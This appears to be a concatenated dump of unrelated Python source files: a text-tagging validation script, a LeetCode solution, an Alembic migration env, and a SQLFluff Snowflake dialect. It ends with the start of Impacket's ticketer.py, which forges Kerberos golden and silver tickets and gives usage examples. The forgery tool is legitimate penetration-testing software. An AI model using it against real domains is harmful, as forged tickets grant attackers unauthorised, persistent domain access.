with current_schema_version_swap:
story = story_fetchers.get_story_from_model(story_model)
self.assertEqual(story.story_contents_schema_version, 5)
self.assertEqual(
story.story_contents.to_dict(), self.VERSION_5_STORY_CONTENTS_DICT)
| 42.633006 | 80 | 0.614747 |
d7f1ce9654a4daebe7ad3dc3f19e224f0716bfa4 | 4,525 | py | Python | src/validation_jaccard_index.py | uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public | 177eca4992cfdfac49c135f5597904182748b873 | [
"MIT"
] | 2 | 2020-03-05T23:30:05.000Z | 2021-01-10T20:48:47.000Z | src/validation_jaccard_index.py | uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public | 177eca4992cfdfac49c135f5597904182748b873 | [
"MIT"
] | null | null | null | src/validation_jaccard_index.py | uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public | 177eca4992cfdfac49c135f5597904182748b873 | [
"MIT"
] | 1 | 2020-04-05T15:00:26.000Z | 2020-04-05T15:00:26.000Z | import pandas as pd
import global_variables as v
def validation(manually_tagged_rows, automatically_tagged_rows, delimiter):
correct = 0
incorrect = 0
ignored = 0
final_jaccard_index = 0
jaccard_count = 0
recordCount = 0
zeroTaggedCount = 0;
for index, row in manually_tagged_rows.iterrows(): # for each manually tagged record
#print(row)
true_tokens = row['tagged_record'].split(' ')
row_number = row['row_number']
final_tokens = []
generated_tokens = []
for true_token in true_tokens:
if delimiter in true_token: # if something is tagged as symptom/state
true_token = true_token.replace('-', ' ') # remove punctuation from results
true_token = true_token.replace(delimiter, ' ') # remove delimiter from results
final_tokens.append(true_token.strip())
test_tokens = automatically_tagged_rows.iloc[row_number - 1] # get the corresponding auto tagged record
test_tokens = test_tokens['tagged_sentence'].split(' ')
for test_token in test_tokens:
if delimiter in test_token:
test_token = test_token.replace('-', ' ') # remove punctuation from results
test_token = test_token.replace(delimiter, ' ') # remove delimiter from results
generated_tokens.append(test_token.strip())
if len(final_tokens) == 0 :
ignored += 1
elif final_tokens == generated_tokens:
correct += 1
else:
incorrect += 1
#print('true' + str(final_tokens))
#print('attempt' + str(generated_tokens))
#print (true_tokens)
if len(final_tokens) == 0 or len(generated_tokens) == 0:
#skip
c = 1
else:
common_phrases = list(set(final_tokens).intersection(generated_tokens))
#print("common: " + str(common_phrases))
all_phrases = list(set(final_tokens+generated_tokens))
#print("all: " + str(all_phrases))
jaccard_count = jaccard_count + len(common_phrases) / len(all_phrases)
recordCount = recordCount + 1
#if (len(all_phrases) == 0 and len(common_phrases) == 0):
# jaccard_count = jaccard_count + 1
# zeroTaggedCount = zeroTaggedCount + 1;
#else:
# jaccard_count = jaccard_count + len(common_phrases)/len(all_phrases)
#recordCount = recordCount + 1
print('correct:')
print(correct)
print('incorrect:')
print(incorrect)
print('% correct:')
print((correct/(incorrect+correct))*100)
final_jaccard_index = jaccard_count/recordCount
print('jaccard_index:')
print(final_jaccard_index)
print(zeroTaggedCount)
manually_tagged_data = pd.read_excel(v.validation_path, sheet_name=v.input_file_sheet_name)
def main():
print("Starting Pipeline Validation")
print("Validating Symptom/State Tagged Records") # 82% # JI:0.823
data = pd.read_excel(v.symptom_state_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.symptom_state_tag_symbol)
print("Validating Maintenance Activity Tagged Records") # 86% # JI:0.897
data = pd.read_excel(v.maintenance_activity_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_activity_tag_symbol)
print("Validating Maintenance Item Tagged Records") # 34% # JI:0.359
data = pd.read_excel(v.maintenance_item_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_item_tag_symbol)
### Baseline validation
print("Validating Symptom/State Tagged Records") # 82%
print(v.baseline_output_path)
data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name)
print('here')
validation(manually_tagged_data, data, v.symptom_state_tag_symbol)
print("Validating Maintenance Activity Tagged Records") # 69%
data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_activity_tag_symbol)
print("Validating Maintenance Item Tagged Records") # 24%
data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name)
validation(manually_tagged_data, data, v.maintenance_item_tag_symbol)
print("Validation Finished")
if __name__ == "__main__":
main() | 38.675214 | 111 | 0.675138 |
1379d320044ca616b0c7409e8afe5c8f388e060e | 532 | py | Python | leetcode/946. Validate Stack Sequences/soln.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 3 | 2017-02-15T20:55:04.000Z | 2018-09-26T18:48:24.000Z | leetcode/946. Validate Stack Sequences/soln.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 4 | 2017-10-07T18:59:20.000Z | 2019-10-08T05:43:25.000Z | leetcode/946. Validate Stack Sequences/soln.py | saisankargochhayat/algo_quest | a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc | [
"Apache-2.0"
] | 1 | 2017-10-08T06:52:21.000Z | 2017-10-08T06:52:21.000Z | class Solution:
def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:
st = []
i, j = 0, 0
while i < len(pushed) and j < len(popped):
# Lets start by pushing an element
st.append(pushed[i])
# Now try popping as much as possible
while st and j < len(popped) and (st[-1] == popped[j]):
st.pop()
j += 1
i += 1
return True if j == len(popped) else False
| 31.294118 | 83 | 0.469925 |
4a7a44fbd6619870d43d004ff6c5a1401c2fba3c | 2,155 | py | Python | alembic/env.py | sheeley/Safe-Streets-Event-Tracker | 0b312f7476e4f5b25bf66cfd4038301a5615fcdb | [
"MIT"
] | 1 | 2016-02-11T06:13:25.000Z | 2016-02-11T06:13:25.000Z | alembic/env.py | sheeley/Safe-Streets-Event-Tracker | 0b312f7476e4f5b25bf66cfd4038301a5615fcdb | [
"MIT"
] | 8 | 2015-04-09T03:38:18.000Z | 2015-05-28T16:33:54.000Z | alembic/env.py | sheeley/Safe-Streets-Event-Tracker | 0b312f7476e4f5b25bf66cfd4038301a5615fcdb | [
"MIT"
] | null | null | null | from __future__ import with_statement
from alembic import context
from sqlalchemy import create_engine, pool
from logging.config import fileConfig
from os import environ
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
env_db = environ.get('DATABASE_URL')
SQLALCHEMY_DATABASE_URI = env_db if env_db else config.get_main_option("sqlalchemy.url")
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
context.configure(
url=SQLALCHEMY_DATABASE_URI, target_metadata=target_metadata, literal_binds=True)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
connectable = create_engine(SQLALCHEMY_DATABASE_URI)
# engine_from_config(
# config.get_section(config.config_ini_section),
# prefix='sqlalchemy.',
# poolclass=pool.NullPool)
with connectable.connect() as connection:
context.configure(
connection=connection,
target_metadata=target_metadata
)
with context.begin_transaction():
context.run_migrations()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
| 28.733333 | 89 | 0.732715 |
8eaa00e9b8d1193c79f4c40c8d8497d7c49955c3 | 18,925 | py | Python | src/sqlfluff/dialects/dialect_snowflake.py | swanderz/sqlfluff | 668f23500ce5d06f4de67333a8957811c2df485f | [
"MIT"
] | null | null | null | src/sqlfluff/dialects/dialect_snowflake.py | swanderz/sqlfluff | 668f23500ce5d06f4de67333a8957811c2df485f | [
"MIT"
] | null | null | null | src/sqlfluff/dialects/dialect_snowflake.py | swanderz/sqlfluff | 668f23500ce5d06f4de67333a8957811c2df485f | [
"MIT"
] | null | null | null | """The Snowflake dialect.
Inherits from Postgres.
Based on https://docs.snowflake.com/en/sql-reference-commands.html
"""
from sqlfluff.core.dialects import load_raw_dialect
from sqlfluff.core.parser import (
BaseSegment,
NamedSegment,
OneOf,
Ref,
Sequence,
AnyNumberOf,
ReSegment,
SymbolSegment,
Bracketed,
Anything,
Delimited,
StartsWith,
Indent,
Dedent,
)
ansi_dialect = load_raw_dialect("ansi")
postgres_dialect = load_raw_dialect("postgres")
snowflake_dialect = postgres_dialect.copy_as("snowflake")
snowflake_dialect.patch_lexer_struct(
[
# In snowflake, a double single quote resolves as a single quote in the string.
# https://docs.snowflake.com/en/sql-reference/data-types-text.html#single-quoted-string-constants
("single_quote", "regex", r"'([^']|'')*'", dict(is_code=True)),
]
)
snowflake_dialect.insert_lexer_struct(
# Keyword assigner needed for keyword functions.
[("parameter_assigner", "regex", r"=>", dict(is_code=True))],
before="not_equal",
)
snowflake_dialect.insert_lexer_struct(
# Column selector
# https://docs.snowflake.com/en/sql-reference/sql/select.html#parameters
[("column_selector", "regex", r"\$[0-9]+", dict(is_code=True))],
before="not_equal",
)
snowflake_dialect.sets("unreserved_keywords").update(
[
"API",
"AUTHORIZATIONS",
"BERNOULLI",
"BLOCK",
"DELEGATED",
"HISTORY",
"LATERAL",
"NETWORK",
"PIPE",
"PIPES",
"QUERIES",
"REGIONS",
"REMOVE",
"SECURE",
"SEED",
"TERSE",
"UNSET",
]
)
snowflake_dialect.sets("reserved_keywords").update(
[
"CLONE",
"MASKING",
"NOTIFICATION",
"PIVOT",
"SAMPLE",
"TABLESAMPLE",
"UNPIVOT",
]
)
snowflake_dialect.add(
# In snowflake, these are case sensitive even though they're not quoted
# so they need a different `name` and `type` so they're not picked up
# by other rules.
ParameterAssignerSegment=SymbolSegment.make(
"=>", name="parameter_assigner", type="parameter_assigner"
),
NakedSemiStructuredElementSegment=ReSegment.make(
r"[A-Z0-9_]*",
name="naked_semi_structured_element",
type="semi_structured_element",
),
QuotedSemiStructuredElementSegment=NamedSegment.make(
"double_quote",
name="quoted_semi_structured_element",
type="semi_structured_element",
),
ColumnIndexIdentifierSegment=ReSegment.make(
r"\$[0-9]+", name="column_index_identifier_segment", type="identifier"
),
)
snowflake_dialect.replace(
Accessor_Grammar=AnyNumberOf(
Ref("ArrayAccessorSegment"),
# Add in semi structured expressions
Ref("SemiStructuredAccessorSegment"),
),
PreTableFunctionKeywordsGrammar=OneOf(Ref("LateralKeywordSegment")),
FunctionContentsExpressionGrammar=OneOf(
Ref("DatetimeUnitSegment"),
Ref("NamedParameterExpressionSegment"),
Sequence(
Ref("ExpressionSegment"),
Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True),
),
),
JoinLikeClauseGrammar=Sequence(
AnyNumberOf(
Ref("FromAtExpressionSegment"),
Ref("FromBeforeExpressionSegment"),
Ref("FromPivotExpressionSegment"),
Ref("FromUnpivotExpressionSegment"),
Ref("SamplingExpressionSegment"),
min_times=1,
),
Ref("TableAliasExpressionSegment", optional=True),
),
SingleIdentifierGrammar=OneOf(
Ref("NakedIdentifierSegment"),
Ref("QuotedIdentifierSegment"),
Ref("ColumnIndexIdentifierSegment"),
),
PostFunctionGrammar=Sequence(
Ref("WithinGroupClauseSegment", optional=True),
Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True),
Ref("OverClauseSegment", optional=True),
),
)
@snowflake_dialect.segment(replace=True)
class StatementSegment(ansi_dialect.get_segment("StatementSegment")): # type: ignore
"""A generic segment, to any of its child subsegments."""
parse_grammar = ansi_dialect.get_segment("StatementSegment").parse_grammar.copy(
insert=[
Ref("UseStatementSegment"),
Ref("CreateStatementSegment"),
Ref("CreateCloneStatementSegment"),
Ref("ShowStatementSegment"),
Ref("AlterUserSegment"),
],
remove=[
Ref("CreateTypeStatementSegment"),
Ref("CreateExtensionStatementSegment"),
Ref("CreateIndexStatementSegment"),
Ref("DropIndexStatementSegment"),
Ref("CreateFunctionStatementSegment"),
],
)
@snowflake_dialect.segment()
class CreateStatementCommentSegment(BaseSegment):
"""A comment in a create statement.
e.g. comment = 'a new view'
"""
type = "snowflake_comment"
match_grammar = Sequence(
Ref.keyword("COMMENT"),
Ref("EqualsSegment"),
Ref("LiteralGrammar"),
)
@snowflake_dialect.segment()
class TableAliasExpressionSegment(BaseSegment):
"""A reference to an object with an `AS` clause, optionally with column aliasing."""
type = "table_alias_expression"
match_grammar = Sequence(
Ref("AliasExpressionSegment"),
# Optional column aliases too.
Bracketed(
Delimited(Ref("SingleIdentifierGrammar"), delimiter=Ref("CommaSegment")),
optional=True,
),
)
@snowflake_dialect.segment()
class FromAtExpressionSegment(BaseSegment):
"""An AT expression."""
type = "from_at_expression"
match_grammar = Sequence("AT", Bracketed(Anything()))
parse_grammar = Sequence(
"AT",
Bracketed(
OneOf("TIMESTAMP", "OFFSET", "STATEMENT"),
Ref("ParameterAssignerSegment"),
Ref("ExpressionSegment"),
),
)
@snowflake_dialect.segment()
class FromBeforeExpressionSegment(BaseSegment):
"""A BEFORE expression."""
type = "from_before_expression"
match_grammar = Sequence("BEFORE", Bracketed(Anything()))
parse_grammar = Sequence(
"BEFORE",
Bracketed(
OneOf("TIMESTAMP", "OFFSET", "STATEMENT"),
Ref("ParameterAssignerSegment"),
Ref("ExpressionSegment"),
),
)
@snowflake_dialect.segment()
class FromPivotExpressionSegment(BaseSegment):
"""A PIVOT expression."""
type = "from_pivot_expression"
match_grammar = Sequence("PIVOT", Bracketed(Anything()))
parse_grammar = Sequence(
"PIVOT",
Bracketed(
Ref("FunctionSegment"),
"FOR",
Ref("SingleIdentifierGrammar"),
"IN",
Bracketed(Delimited(Ref("LiteralGrammar"), delimiter=Ref("CommaSegment"))),
),
)
@snowflake_dialect.segment()
class FromUnpivotExpressionSegment(BaseSegment):
"""An UNPIVOT expression."""
type = "from_unpivot_expression"
match_grammar = Sequence("UNPIVOT", Bracketed(Anything()))
parse_grammar = Sequence(
"UNPIVOT",
Bracketed(
Ref("SingleIdentifierGrammar"),
"FOR",
Ref("SingleIdentifierGrammar"),
"IN",
Bracketed(
Delimited(Ref("SingleIdentifierGrammar"), delimiter=Ref("CommaSegment"))
),
),
)
@snowflake_dialect.segment()
class SamplingExpressionSegment(BaseSegment):
"""A sampling expression."""
type = "snowflake_sample_expression"
match_grammar = Sequence(
OneOf("SAMPLE", "TABLESAMPLE"),
OneOf("BERNOULLI", "ROW", "SYSTEM", "BLOCK", optional=True),
Bracketed(Ref("NumericLiteralSegment"), Ref.keyword("ROWS", optional=True)),
Sequence(
OneOf("REPEATABLE", "SEED"),
Bracketed(Ref("NumericLiteralSegment")),
optional=True,
),
)
@snowflake_dialect.segment()
class NamedParameterExpressionSegment(BaseSegment):
"""A keyword expression.
e.g. 'input => custom_fields'
"""
type = "snowflake_keyword_expression"
match_grammar = Sequence(
Ref("ParameterNameSegment"),
Ref("ParameterAssignerSegment"),
OneOf(
Ref("LiteralGrammar"),
Ref("ColumnReferenceSegment"),
Ref("ExpressionSegment"),
),
)
@snowflake_dialect.segment()
class SemiStructuredAccessorSegment(BaseSegment):
"""A semi-structured data accessor segment.
https://docs.snowflake.com/en/user-guide/semistructured-considerations.html
"""
type = "snowflake_semi_structured_expression"
match_grammar = Sequence(
Ref("ColonSegment"),
OneOf(
Ref("NakedSemiStructuredElementSegment"),
Ref("QuotedSemiStructuredElementSegment"),
),
Ref("ArrayAccessorSegment", optional=True),
AnyNumberOf(
Sequence(
OneOf(
# Can be delimited by dots or colons
Ref("DotSegment"),
Ref("ColonSegment"),
),
OneOf(
Ref("NakedSemiStructuredElementSegment"),
Ref("QuotedSemiStructuredElementSegment"),
),
Ref("ArrayAccessorSegment", optional=True),
allow_gaps=True,
),
allow_gaps=True,
),
allow_gaps=True,
)
@snowflake_dialect.segment(replace=True)
class SelectClauseModifierSegment(
ansi_dialect.get_segment("SelectClauseModifierSegment") # type: ignore
):
"""Things that come after SELECT but before the columns.
In snowflake we go back to similar functionality as the ANSI
version in the root dialect, without the things added in
postgres.
"""
@snowflake_dialect.segment()
class QualifyClauseSegment(BaseSegment):
"""A `QUALIFY` clause like in `SELECT`.
https://docs.snowflake.com/en/sql-reference/constructs/qualify.html
"""
type = "having_clause"
match_grammar = StartsWith(
"QUALIFY",
terminator=OneOf(
"ORDER",
"LIMIT",
),
)
parse_grammar = Sequence(
"QUALIFY",
Indent,
OneOf(
Bracketed(
Ref("ExpressionSegment"),
),
Ref("ExpressionSegment"),
),
Dedent,
)
@snowflake_dialect.segment(replace=True)
class SelectStatementSegment(ansi_dialect.get_segment("SelectStatementSegment")): # type: ignore
"""A snowflake `SELECT` statement including optional Qualify.
https://docs.snowflake.com/en/sql-reference/constructs/qualify.html
"""
type = "select_statement"
match_grammar = StartsWith(
# NB: In bigquery, the select clause may include an EXCEPT, which
# will also match the set operator, but by starting with the whole
# select clause rather than just the SELECT keyword, we normally
# mitigate that here. But this isn't BigQuery! So we can be more
# efficient and just just the keyword.
"SELECT",
terminator=Ref("SetOperatorSegment"),
)
parse_grammar = ansi_dialect.get_segment(
"SelectStatementSegment"
).parse_grammar.copy(
insert=[Ref("QualifyClauseSegment", optional=True)],
before=Ref("OrderByClauseSegment", optional=True),
)
@snowflake_dialect.segment()
class UseStatementSegment(BaseSegment):
"""A snowflake `USE` statement.
https://docs.snowflake.com/en/sql-reference/sql/use.html
"""
type = "use_statement"
match_grammar = StartsWith("USE")
parse_grammar = Sequence(
"USE",
OneOf("ROLE", "WAREHOUSE", "DATABASE", "SCHEMA", optional=True),
Ref("ObjectReferenceSegment"),
)
@snowflake_dialect.segment()
class CreateCloneStatementSegment(BaseSegment):
"""A snowflake `CREATE ... CLONE` statement.
https://docs.snowflake.com/en/sql-reference/sql/create-clone.html
"""
type = "create_clone_statement"
match_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
OneOf(
"DATABASE",
"SCHEMA",
"TABLE",
"SEQUENCE",
Sequence("FILE", "FORMAT"),
"STAGE",
"STREAM",
"TASK",
),
Sequence("IF", "NOT", "EXISTS", optional=True),
Ref("SingleIdentifierGrammar"),
"CLONE",
Ref("SingleIdentifierGrammar"),
OneOf(
Ref("FromAtExpressionSegment"),
Ref("FromBeforeExpressionSegment"),
optional=True,
),
)
@snowflake_dialect.segment()
class CreateStatementSegment(BaseSegment):
"""A snowflake `CREATE` statement.
https://docs.snowflake.com/en/sql-reference/sql/create.html
"""
type = "create_statement"
match_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
OneOf(
Sequence("NETWORK", "POLICY"),
Sequence("RESOURCE", "MONITOR"),
"SHARE",
"ROLE",
"USER",
"WAREHOUSE",
Sequence("NOTIFICATION", "INTEGRATION"),
Sequence("SECURITY", "INTEGRATION"),
Sequence("STORAGE", "INTEGRATION"),
Sequence("EXTERNAL", "TABLE"),
"VIEW",
Sequence("MATERIALIZED", "VIEW"),
Sequence("SECURE", "VIEW"),
Sequence("MASKING", "POLICY"),
"PIPE",
"FUNCTION",
Sequence("EXTERNAL", "FUNCTION"),
"PROCEDURE",
# Objects that also support clone
"DATABASE",
"SCHEMA",
"TABLE",
"SEQUENCE",
Sequence("FILE", "FORMAT"),
"STAGE",
"STREAM",
"TASK",
),
Sequence("IF", "NOT", "EXISTS", optional=True),
Ref("ObjectReferenceSegment"),
Ref("CreateStatementCommentSegment", optional=True),
Ref.keyword("AS", optional=True),
Ref("SelectStatementSegment", optional=True),
)
@snowflake_dialect.segment()
class ShowStatementSegment(BaseSegment):
"""A snowflake `SHOW` statement.
https://docs.snowflake.com/en/sql-reference/sql/show.html
"""
_object_types_plural = OneOf(
"PARAMETERS",
Sequence("GLOBAL", "ACCOUNTS"),
"REGIONS",
Sequence("REPLICATION", "ACCOUNTS"),
Sequence("REPLICATION", "DATABASES"),
"PARAMETERS",
"VARIABLES",
"TRANSACTIONS",
"LOCKS",
"PARAMETERS",
"FUNCTIONS",
Sequence("NETWORK", "POLICIES"),
"SHARES",
"ROLES",
"GRANTS",
"USERS",
"WAREHOUSES",
"DATABASES",
Sequence(
OneOf("API", "NOTIFICATION", "SECURITY", "STORAGE", optional=True),
"INTEGRATIONS",
),
"SCHEMAS",
"OBJECTS",
"TABLES",
Sequence("EXTERNAL", "TABLES"),
"VIEWS",
Sequence("MATERIALIZED", "VIEWS"),
Sequence("MASKING", "POLICIES"),
"COLUMNS",
Sequence("FILE", "FORMATS"),
"SEQUENCES",
"STAGES",
"PIPES",
"STREAMS",
"TASKS",
Sequence("USER", "FUNCTIONS"),
Sequence("EXTERNAL", "FUNCTIONS"),
"PROCEDURES",
Sequence("FUTURE", "GRANTS"),
)
_object_scope_types = OneOf(
"ACCOUNT",
"SESSION",
Sequence(
OneOf(
"DATABASE",
"SCHEMA",
"SHARE",
"ROLE",
"TABLE",
"TASK",
"USER",
"WAREHOUSE",
"VIEW",
),
Ref("ObjectReferenceSegment", optional=True),
),
)
type = "show_statement"
match_grammar = Sequence(
"SHOW",
OneOf("TERSE", optional=True),
_object_types_plural,
OneOf("HISTORY", optional=True),
Sequence("LIKE", Ref("QuotedLiteralSegment"), optional=True),
Sequence(
OneOf("ON", "TO", "OF", "IN"),
OneOf(
Sequence(_object_scope_types),
Ref("ObjectReferenceSegment"),
),
optional=True,
),
Sequence("STARTS", "WITH", Ref("QuotedLiteralSegment"), optional=True),
Sequence("WITH", "PRIMARY", Ref("ObjectReferenceSegment"), optional=True),
Sequence(
Ref("LimitClauseSegment"),
Sequence("FROM", Ref("QuotedLiteralSegment"), optional=True),
optional=True,
),
)
@snowflake_dialect.segment()
class AlterUserSegment(BaseSegment):
"""`ALTER USER` statement.
https://docs.snowflake.com/en/sql-reference/sql/alter-user.html
All user parameters can be found here
https://docs.snowflake.com/en/sql-reference/parameters.html
"""
type = "alter_user"
match_grammar = StartsWith(
Sequence("ALTER", "USER"),
)
parse_grammar = Sequence(
"ALTER",
"USER",
Sequence("IF", "EXISTS", optional=True),
Ref("ObjectReferenceSegment"),
OneOf(
Sequence("RENAME", "TO", Ref("ObjectReferenceSegment")),
Sequence("RESET", "PASSWORD"),
Sequence("ABORT", "ALL", "QUERIES"),
Sequence(
"ADD",
"DELEGATED",
"AUTHORIZATION",
"OF",
"ROLE",
Ref("ObjectReferenceSegment"),
"TO",
"SECURITY",
"INTEGRATION",
Ref("ObjectReferenceSegment"),
),
Sequence(
"REMOVE",
"DELEGATED",
OneOf(
Sequence(
"AUTHORIZATION", "OF", "ROLE", Ref("ObjectReferenceSegment")
),
"AUTHORIZATIONS",
),
"FROM",
"SECURITY",
"INTEGRATION",
Ref("ObjectReferenceSegment"),
),
# Snowflake supports the SET command with space delimitted parameters, but it also supports
# using commas which is better supported by `Delimited`, so we will just use that.
Sequence(
"SET",
Delimited(
Sequence(
Ref("ParameterNameSegment"),
Ref("EqualsSegment"),
OneOf(Ref("LiteralGrammar"), Ref("ObjectReferenceSegment")),
),
),
),
Sequence("UNSET", Delimited(Ref("ParameterNameSegment"))),
),
)
| 28.078635 | 105 | 0.57395 |
8b50d1da8b365e4e1f065e7d052ddbaa27969c22 | 42,528 | py | Python | tools/impackets/build/scripts-3.8/ticketer.py | c0axial/hackthebox | db9fa3d7b75bf779399d17f8923ff743379631be | [
"MIT"
] | 1 | 2021-03-15T20:05:05.000Z | 2021-03-15T20:05:05.000Z | tools/impackets/build/scripts-3.8/ticketer.py | oppsec/hackthebox | dd33e0f182af1ad28812af9662d47bdbbcbea9d3 | [
"MIT"
] | null | null | null | tools/impackets/build/scripts-3.8/ticketer.py | oppsec/hackthebox | dd33e0f182af1ad28812af9662d47bdbbcbea9d3 | [
"MIT"
] | 1 | 2020-12-29T14:00:13.000Z | 2020-12-29T14:00:13.000Z | #!/usr/bin/python3
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This script will create TGT/TGS tickets from scratch or based on a template (legally requested from the KDC)
# allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the
# groups, extrasids, etc.
# Tickets duration is fixed to 10 years from now (although you can manually change it)
#
# References:
# Original presentation at BlackHat USA 2014 by @gentilkiwi and @passingthehash:
# (https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it)
# Original implementation by Benjamin Delpy (@gentilkiwi) in mimikatz
# (https://github.com/gentilkiwi/mimikatz)
#
# Examples:
# ./ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser
#
# will create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4.
# If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256
# (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as
# baduser.ccache.
#
# ./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain <your domain FQDN>
# -request -user <a valid domain user> -password <valid domain user's password> baduser
#
# will first authenticate against the KDC (using -user/-password) and get a TGT that will be used
# as template for customization. Whatever encryption algorithms used on that ticket will be honored,
# hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser' and saved
# as baduser.ccache.
#
# ToDo:
# [X] Silver tickets still not implemented - DONE by @machosec and fixes by @br4nsh
# [ ] When -request is specified, we could ask for a user2user ticket and also populate the received PAC
#
from __future__ import division
from __future__ import print_function
import argparse
import datetime
import logging
import random
import string
import sys
from calendar import timegm
from time import strptime
from binascii import unhexlify
from pyasn1.codec.der import encoder, decoder
from pyasn1.type.univ import noValue
from impacket import version
from impacket.dcerpc.v5.dtypes import RPC_SID
from impacket.dcerpc.v5.ndr import NDRULONG
from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \
SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD
from impacket.examples import logger
from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart
from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \
PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \
KERB_NON_KERB_CKSUM_SALT
from impacket.krb5.keytab import Keytab
from impacket.krb5.crypto import Key, _enctype_table
from impacket.krb5.crypto import _checksum_table, Enctype
from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, \
PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM, PACTYPE, PKERB_SID_AND_ATTRIBUTES_ARRAY, \
VALIDATION_INFO, PAC_CLIENT_INFO, KERB_VALIDATION_INFO
from impacket.krb5.types import KerberosTime, Principal
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
class TICKETER:
def __init__(self, target, password, domain, options):
self.__password = password
self.__target = target
self.__domain = domain
self.__options = options
if options.spn:
spn = options.spn.split('/')
self.__service = spn[0]
self.__server = spn[1]
if options.keytab is not None:
self.loadKeysFromKeytab(options.keytab)
# we are creating a golden ticket
else:
self.__service = 'krbtgt'
self.__server = self.__domain
@staticmethod
def getFileTime(t):
t *= 10000000
t += 116444736000000000
return t
def loadKeysFromKeytab(self, filename):
keytab = Keytab.loadFile(filename)
keyblock = keytab.getKey("%s@%s" % (options.spn, self.__domain))
if keyblock:
if keyblock["keytype"] == Enctype.AES256 or keyblock["keytype"] == Enctype.AES128:
options.aesKey = keyblock.hexlifiedValue()
elif keyblock["keytype"] == Enctype.RC4:
options.nthash = keyblock.hexlifiedValue()
else:
logging.warning("No matching key for SPN '%s' in given keytab found!", options.spn)
def createBasicValidationInfo(self):
# 1) KERB_VALIDATION_INFO
kerbdata = KERB_VALIDATION_INFO()
aTime = timegm(datetime.datetime.utcnow().timetuple())
unixTime = self.getFileTime(aTime)
kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
# LogoffTime: A FILETIME structure that contains the time the client's logon
# session should expire. If the session should not expire, this structure
# SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime
# member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as
# an indicator of when to warn the user that the allowed time is due to expire.
kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF
kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF
# KickOffTime: A FILETIME structure that contains LogoffTime minus the user
# account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the
# client should not be logged off, this structure SHOULD have the dwHighDateTime
# member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF.
# The Kerberos service ticket end time is a replacement for KickOffTime.
# The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of
# an account. A recipient of the PAC SHOULD<8> use this value as the indicator
# of when the client should be forcibly disconnected.
kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF
kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF
kerbdata['PasswordLastSet']['dwLowDateTime'] = unixTime & 0xffffffff
